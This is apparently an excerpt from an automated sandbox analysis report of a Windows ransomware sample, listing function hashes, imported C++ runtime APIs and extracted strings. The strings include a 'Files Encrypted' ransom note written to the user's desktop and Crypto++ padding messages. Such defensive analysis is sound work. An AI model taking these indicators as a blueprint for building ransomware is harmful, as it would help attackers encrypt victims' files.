                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99ea7e6900bb8866a17359a198d066e5fdaf4bfb547f946d92b658355bfeb258
                • Instruction ID: 68f56bab3b6c19f746140c6cbacd90232ef5e7d48ce45bf31c98151323e602cf
                • Opcode Fuzzy Hash: 99ea7e6900bb8866a17359a198d066e5fdaf4bfb547f946d92b658355bfeb258
                • Instruction Fuzzy Hash: E391BE33E19B8189E3118F7DE4416ED6761EB95398F149324EFD866E88EF38E54AC300
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9d286b13ffae1578e684bb1020083730452a778b0e1c4c2c8477c30c38cd9494
                • Instruction ID: 0f7ed38c837d2e162d576437d702ab8418ead4d666aa5311c3279dab9ddb8ca6
                • Opcode Fuzzy Hash: 9d286b13ffae1578e684bb1020083730452a778b0e1c4c2c8477c30c38cd9494
                • Instruction Fuzzy Hash: 44A12E338261709BD380CB1ED059B6F33A9F744395F23832BDE9267281D637AC0997A5
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1437f749cac9f131c210edc142373da7746e7153ad876a3a88a91066ead9a5ca
                • Instruction ID: 587b39e85ee12d2cfdb68051926d22a6d2d930c39310e6f171406b8135e5ea70
                • Opcode Fuzzy Hash: 1437f749cac9f131c210edc142373da7746e7153ad876a3a88a91066ead9a5ca
                • Instruction Fuzzy Hash: 1451E477B057484BCB188F4AA94165AB695F3D8788B09903ADF5D87B90EA3CE9108740
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 567a254704e10f6dd68a7fed4598a22d88dd831c12a43c28395db30b1de049dd
                • Instruction ID: b81033b0a2dd266bee4b4eb107fa93394ea1ad1bc29b1a0903a2e3adae62f2fa
                • Opcode Fuzzy Hash: 567a254704e10f6dd68a7fed4598a22d88dd831c12a43c28395db30b1de049dd
                • Instruction Fuzzy Hash: 7E514553648EE853D62E0B3DA5913E7E291EFD9309F11C315EFE127683E72EA148B610
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ef00e1892a952b848ac899107cb729ed9e19a0f58286baa20722f729c5578c79
                • Instruction ID: 7f113077980515bd6382eece4dd1c6921f46b5faf6ab8c82005930fb626399ae
                • Opcode Fuzzy Hash: ef00e1892a952b848ac899107cb729ed9e19a0f58286baa20722f729c5578c79
                • Instruction Fuzzy Hash: 9331ED32718B8886DB018B2AE480399AB94F7D5BD8F485239DE8D87B98DBB9D044C700
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b38a2b101e259f6e254d093f64ece74e0218c2257faef28a11d3a33cb32a4e6e
                • Instruction ID: af76be151505ea3a2b2246ee1d0a2d0baffc6ba17470996c16129ff9dc1daa60
                • Opcode Fuzzy Hash: b38a2b101e259f6e254d093f64ece74e0218c2257faef28a11d3a33cb32a4e6e
                • Instruction Fuzzy Hash: 4831827231864845FB5DDA60AA7F7D6E99AA38C3C0F49F137DE964E658EE3CC141CA00
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 509e356a70a69fee75e6004179e37b9800559dc64f4470ea1333ea12fbfa7096
                • Instruction ID: f278f440ebfc5418aee7ebf7d96c1c317b7af8fe0a1247e526064bfc010c0d18
                • Opcode Fuzzy Hash: 509e356a70a69fee75e6004179e37b9800559dc64f4470ea1333ea12fbfa7096
                • Instruction Fuzzy Hash: EC214DA2F346B606DF12863B85848549A529FA73D0765E323FD3871DD5FB1BE1D18B00
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9a6cf7086033877038e98547aab7e423bf7c8cca03c2a5b6a100fcbf2f159150
                • Instruction ID: fc0d049b2dc5df9cd07b41cf2bb31fd53c09d3ff983adc2e2dbfe280787cb06f
                • Opcode Fuzzy Hash: 9a6cf7086033877038e98547aab7e423bf7c8cca03c2a5b6a100fcbf2f159150
                • Instruction Fuzzy Hash: 3E31FC53D16A9852E7136B3D530B3B7D3A2BBD43E9F318341DBC562A46EB3DA344A210
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d0fcaf2023bbb405993fb51d892c165668b09eb84f5d228c1ad3354ffab6a74
                • Instruction ID: 6bf61dbc681921339877d340fecf68607acddbaa2f18a97a2f90db46406aba9b
                • Opcode Fuzzy Hash: 2d0fcaf2023bbb405993fb51d892c165668b09eb84f5d228c1ad3354ffab6a74
                • Instruction Fuzzy Hash: 42A00121938D0390EB048B60AA90C702A21BB687C1B415132C03D910A0AF2CA4009200
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$?setstate@?$basic_ios@Bios_base@std@@D@std@@@std@@U?$char_traits@_dupenv_sfreememset
                • String ID: </p></body></html>$<html><body><h1>Files Encrypted</h1><p>Your files have been encrypted.</p>$<p>Unique id: $USERPROFILE$\Desktop\README.html
                • API String ID: 1662671771-2662666688
                • Opcode ID: 00b49e682827ec137516dc6d34efd380ba56445dddda408d624b84794de18919
                • Instruction ID: 5f9f370f0b8cdd56bdb75d68d1c1cc1c77b9336a9b6b86f404a0ca18ce31e416
                • Opcode Fuzzy Hash: 00b49e682827ec137516dc6d34efd380ba56445dddda408d624b84794de18919
                • Instruction Fuzzy Hash: 40718372A28B8696EB10DF25D5403A96361FB857D4F405236EABD83AE9EF3CE145C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handleabort$Create
                • String ID:
                • API String ID: 503677281-0
                • Opcode ID: 740b96d01adb45c042b5fa50dd2d587a1558b15336f0030c52e18ff8ab161487
                • Instruction ID: 2e0e9178064479e6a9e46452f1e99398d3f22f0113b2ead7fd9f91bc287a73e2
                • Opcode Fuzzy Hash: 740b96d01adb45c042b5fa50dd2d587a1558b15336f0030c52e18ff8ab161487
                • Instruction Fuzzy Hash: B3518022F2864289F724AB759A446BD3BA1AF457E4F040335CD3FD7AD9EF28E4458780
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow$_invalid_parameter_noinfo_noreturn
                • String ID: ArraySink: missing OutputBuffer argument$BlockPaddingScheme$FilterWithBufferedInput$OutputBuffer$StreamTransformationFilter: ONE_AND_ZEROS_PADDING cannot be used with $StreamTransformationFilter: PKCS_PADDING cannot be used with $StreamTransformationFilter: W3C_PADDING cannot be used with
                • API String ID: 2822070131-2998954418
                • Opcode ID: 3d1008968bc2a02b8092f10083acea29f7f9736a9989f6d089f98a278259762e
                • Instruction ID: 81c3faefe9fcb59b298519ea736e9574d19e5e15c15da6744676fe4f0892e3d3
                • Opcode Fuzzy Hash: 3d1008968bc2a02b8092f10083acea29f7f9736a9989f6d089f98a278259762e
                • Instruction Fuzzy Hash: B7918262A28A4692EF20DB25E9913AD7361FB89BC4F445132DA7D837E5EF3CD509C700
                APIs
                • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18AD56E
                • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6F18AD58E
                • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18AD59E
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD5E6
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD60E
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD653
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD66E
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD69A
                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD6C6
                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6F18AD70C
                • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF6F18AD713
                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6F18AD720
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                • String ID:
                • API String ID: 3107587312-0
                • Opcode ID: 42cb97062379d30c0ac274d840254f2e46a49a1e5ee3ef49eac8aa2a1317986d
                • Instruction ID: 7b7ba6041b5fd5b941ce1d3bd42662cd767a8f3c6d43b3c4239c54bb0c2fe205
                • Opcode Fuzzy Hash: 42cb97062379d30c0ac274d840254f2e46a49a1e5ee3ef49eac8aa2a1317986d
                • Instruction Fuzzy Hash: 5A816162A19A9292EB10CB19D6D013C7BA1EF85BD5B158232DA7FC37E0DF39D852C740
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: Cpp_error@std@@Throw_$Cnd_broadcastCnd_destroy_in_situMtx_lockMtx_unlockThrd_idThrd_join_invalid_parameter_noinfo_noreturnterminate
                • String ID:
                • API String ID: 161867533-0
                • Opcode ID: 25e21b5595269a41144fcc7003ceeecc782cf720a254ea9ac62e042dc33aefc8
                • Instruction ID: 6435816dd4b93f85caa55ca85bfc93c9e4600d0832b52279d2e12b0f670c07e9
                • Opcode Fuzzy Hash: 25e21b5595269a41144fcc7003ceeecc782cf720a254ea9ac62e042dc33aefc8
                • Instruction Fuzzy Hash: 54415D21A28A82A7FB188B64D65436973A5FF50BD5F088536D77D83AD4EF6CE4A4C300
                APIs
                • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6F18AA9A1
                • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AA9C0
                • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AA9F2
                • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAA0D
                • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAA37
                • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAA54
                • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAA7B
                • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAAC6
                  • Part of subcall function 00007FF6F18AB860: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6F18AB88D
                  • Part of subcall function 00007FF6F18AB860: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6F18AB8A7
                  • Part of subcall function 00007FF6F18AB860: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6F18AB8D9
                  • Part of subcall function 00007FF6F18AB860: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6F18AB904
                  • Part of subcall function 00007FF6F18AB860: std::_Facet_Register.LIBCPMT ref: 00007FF6F18AB91D
                  • Part of subcall function 00007FF6F18AB860: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6F18AB93C
                • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAADB
                • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAAF2
                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAB34
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                • String ID:
                • API String ID: 3067465659-0
                • Opcode ID: bf4288761464458186b2dd3bdc82ff1428ff7499f2b4e43a75d4025665c45866
                • Instruction ID: 53e9f9841eb246f40b814b5b451c84485c0bef2b1bf61d7e96e3b2018aafcaaa
                • Opcode Fuzzy Hash: bf4288761464458186b2dd3bdc82ff1428ff7499f2b4e43a75d4025665c45866
                • Instruction Fuzzy Hash: 53518E32619B8286EB00CF65E95026D77A5FB49FC9F144036CAAE83BA4EF3DD015C700
                APIs
                • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A65D5), ref: 00007FF6F18AC8ED
                • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6F18AC90C
                • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6F18AC93E
                • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6F18AC959
                • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF6F18AC983
                • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6F18AC9A0
                • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6F18AC9C7
                • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF6F18ACA12
                  • Part of subcall function 00007FF6F18AB860: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6F18AB88D
                  • Part of subcall function 00007FF6F18AB860: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6F18AB8A7
                  • Part of subcall function 00007FF6F18AB860: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6F18AB8D9
                  • Part of subcall function 00007FF6F18AB860: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6F18AB904
                  • Part of subcall function 00007FF6F18AB860: std::_Facet_Register.LIBCPMT ref: 00007FF6F18AB91D
                  • Part of subcall function 00007FF6F18AB860: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6F18AB93C
                • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18ACA27
                • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6F18ACA3E
